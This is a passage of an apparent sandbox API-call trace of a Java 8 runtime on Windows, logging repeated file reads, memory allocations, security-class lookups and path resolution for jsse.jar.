lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.698] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x56147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=352583) returned 1 [0105.698] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.699] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x58147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=360775) returned 1 [0105.699] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.699] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x5a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=368967) returned 1 [0105.699] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.700] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x5c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=377159) returned 1 [0105.700] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.701] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x5e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=385351) returned 1 [0105.701] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.701] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x60147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=393543) returned 1 [0105.701] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.702] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x62147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=401735) returned 1 [0105.702] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.703] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x64147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=409927) returned 1 [0105.703] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.703] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x66147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=418119) returned 1 [0105.703] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.704] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x68147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=426311) returned 1 [0105.704] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.705] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=434503) returned 1 [0105.705] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.706] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=442695) returned 1 [0105.706] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.706] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=450887) returned 1 [0105.706] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.707] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x70147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=459079) returned 1 [0105.707] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.719] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x72147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=467271) returned 1 [0105.719] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.720] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x74147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=475463) returned 1 [0105.720] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.721] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x76147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=483655) returned 1 [0105.721] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.722] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x78147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=491847) returned 1 [0105.722] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.733] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x7a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=500039) returned 1 [0105.733] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.734] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x7c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=508231) returned 1 [0105.734] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.734] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x7e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=516423) returned 1 [0105.735] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.735] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x80147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=524615) returned 1 [0105.735] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.736] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x82147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=532807) returned 1 [0105.736] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.737] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x84147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=540999) returned 1 [0105.737] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.737] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x86147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=549191) returned 1 [0105.738] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.740] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x88147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=557383) returned 1 [0105.740] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.741] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x8a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=565575) returned 1 [0105.741] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.742] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x8c147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=573767) returned 1 [0105.742] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.742] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x8e147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=581959) returned 1 [0105.743] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.743] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x90147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=590151) returned 1 [0105.743] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.744] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x92147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=598343) returned 1 [0105.744] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.745] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x94147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=606535) returned 1 [0105.745] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.745] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x96147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=614727) returned 1 [0105.745] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.746] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x98147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=622919) returned 1 [0105.746] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.747] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x9a147, lpNewFilePointer=0x208d2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2e0*=631111) returned 1 [0105.747] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d3f0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208d2b0, lpOverlapped=0x0 | out: lpBuffer=0x208d3f0*, lpNumberOfBytesRead=0x208d2b0*=0x2000, lpOverlapped=0x0) returned 1 [0105.764] strlen (_Str="java/security/MessageDigest") returned 0x1b [0105.765] strlen (_Str="java/security/MessageDigest.class") returned 0x21 [0105.765] malloc (_Size=0x48) returned 0x1228ee10 [0105.765] malloc (_Size=0xa0) returned 0x12329bd0 [0105.765] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f04c4, lpNewFilePointer=0x208d930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d930*=54461636) returned 1 [0105.765] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d900, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208d900*=0xa0, lpOverlapped=0x0) returned 1 [0105.766] malloc (_Size=0x22) returned 0x122fa440 [0106.079] strlen (_Str="java/security/MessageDigestSpi") returned 0x1e [0106.080] strlen (_Str="sun/security/jca/GetInstance.class") returned 0x22 [0106.080] malloc (_Size=0x48) returned 0x1228ef50 [0106.080] malloc (_Size=0xa0) returned 0x12329bd0 [0106.080] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f03ce, lpNewFilePointer=0x208e330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e330*=54461390) returned 1 [0106.080] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e300, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208e300*=0xa0, lpOverlapped=0x0) returned 1 [0106.080] malloc (_Size=0x23) returned 0x122fa2f0 [0106.131] strlen (_Str="sun/security/jca/ProviderList.class") returned 0x23 [0106.131] malloc (_Size=0x48) returned 0x1228e460 [0106.131] malloc (_Size=0xa0) returned 0x12329bd0 [0106.131] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f0231, lpNewFilePointer=0x208daf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208daf0*=54460977) returned 1 [0106.131] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dac0, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208dac0*=0xa0, lpOverlapped=0x0) returned 1 [0106.131] malloc (_Size=0x24) returned 0x122fa140 [0106.156] strlen (_Str="sun/misc/FloatingDecimal.class") returned 0x1e [0106.156] malloc (_Size=0x48) returned 0x1228e960 [0106.156] malloc (_Size=0xa0) returned 0x12329bd0 [0106.156] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410913, lpNewFilePointer=0x208ce30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce30*=54593811) returned 1 [0106.156] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce00, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208ce00*=0xa0, lpOverlapped=0x0) returned 1 [0106.158] malloc (_Size=0x1f) returned 0x122fa050 [0106.170] strlen (_Str="sun/misc/FloatingDecimal$ExceptionalBinaryToASCIIBuffer.class") returned 0x3d [0106.170] malloc (_Size=0x48) returned 0x1228eeb0 [0106.171] malloc (_Size=0xa0) returned 0x12329bd0 [0106.171] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34108a8, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=54593704) returned 1 [0106.171] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208c780*=0xa0, lpOverlapped=0x0) returned 1 [0106.171] malloc (_Size=0x3e) returned 0x1228efa0 [0106.174] strlen (_Str="sun/misc/FloatingDecimal$BinaryToASCIIBuffer.class") returned 0x32 [0106.174] malloc (_Size=0x48) returned 0x1228ee10 [0106.174] malloc (_Size=0xa0) returned 0x12329bd0 [0106.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34107e5, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=54593509) returned 1 [0106.174] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208c780*=0xa0, lpOverlapped=0x0) returned 1 [0106.174] malloc (_Size=0x33) returned 0x12298680 [0106.200] strlen (_Str="sun/misc/FloatingDecimal$1.class") returned 0x20 [0106.200] malloc (_Size=0x48) returned 0x1228e730 [0106.200] malloc (_Size=0xa0) returned 0x12329bd0 [0106.200] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410797, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=54593431) returned 1 [0106.200] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208c780*=0xa0, lpOverlapped=0x0) returned 1 [0106.200] malloc (_Size=0x21) returned 0x122f9ff0 [0106.201] strlen (_Str="sun/misc/FloatingDecimal$PreparedASCIIToBinaryBuffer.class") returned 0x3a [0106.202] malloc (_Size=0x48) returned 0x1228ed70 [0106.202] malloc (_Size=0xa0) returned 0x12329bd0 [0106.202] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341072f, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=54593327) returned 1 [0106.202] ReadFile (in: hFile=0x134, lpBuffer=0x12329bd0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x12329bd0*, lpNumberOfBytesRead=0x208c780*=0xa0, lpOverlapped=0x0) returned 1 [0106.202] malloc (_Size=0x3b) returned 0x1228e5a0 [0106.616] strlen (_Str="sun/security/jca/ProviderConfig$2.class") returned 0x27 [0106.616] malloc (_Size=0x48) returned 0x1228e460 [0106.616] malloc (_Size=0xa0) returned 0x122f9c80 [0106.616] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33efee8, lpNewFilePointer=0x208e3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3b0*=54460136) returned 1 [0106.616] ReadFile (in: hFile=0x134, lpBuffer=0x122f9c80, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e380, lpOverlapped=0x0 | out: lpBuffer=0x122f9c80*, lpNumberOfBytesRead=0x208e380*=0xa0, lpOverlapped=0x0) returned 1 [0106.616] malloc (_Size=0x28) returned 0x122fa110 [0106.620] strlen (_Str="sun/security/provider/Sun") returned 0x19 [0106.620] strlen (_Str="sun/security/provider/Sun.class") returned 0x1f [0106.622] _fullpath (in: _FullPath=0x208d6a0, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", _SizeInBytes=0x400 | out: _FullPath="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" [0106.622] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 0x2f [0106.622] FindFirstFileA (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d560 | out: lpFindFileData=0x208d560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x426680 [0106.623] FindClose (in: hFindFile=0x426680 | out: hFindFile=0x426680) returned 1 [0106.623] strlen (_Str="Program Files") returned 0xd [0106.623] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d560 | out: lpFindFileData=0x208d560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="Java", cAlternateFileName="")) returned 0x426320 [0106.624] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0106.624] strlen (_Str="Java") returned 0x4 [0106.624] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d560 | out: lpFindFileData=0x208d560*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x426320 [0106.625] FindClose (in: hFindFile=0x426320 | out: hFindFile=0x426320) returned 1 [0106.625] strlen (_Str="jre1.8.0_171") returned 0xc [0106.625] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208d560 | out: lpFindFileData=0x208d560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="lib", cAlternateFileName="")) returned 0x425b40 [0106.625] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0106.625] strlen (_Str="lib") returned 0x3 [0106.626] FindFirstFileA (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", lpFindFileData=0x208d560 | out: lpFindFileData=0x208d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed06ba66, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed06ba66, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed08b63d, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x916df, dwReserved0=0x0, dwReserved1=0x61c67678, cFileName="jsse.jar", cAlternateFileName="")) returned 0x426740 [0106.626] FindClose (in: hFindFile=0x426740 | out: hFindFile=0x426740) returned 1 [0106.626] strlen (_Str="jsse.jar") returned 0x8 [0106.626] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", 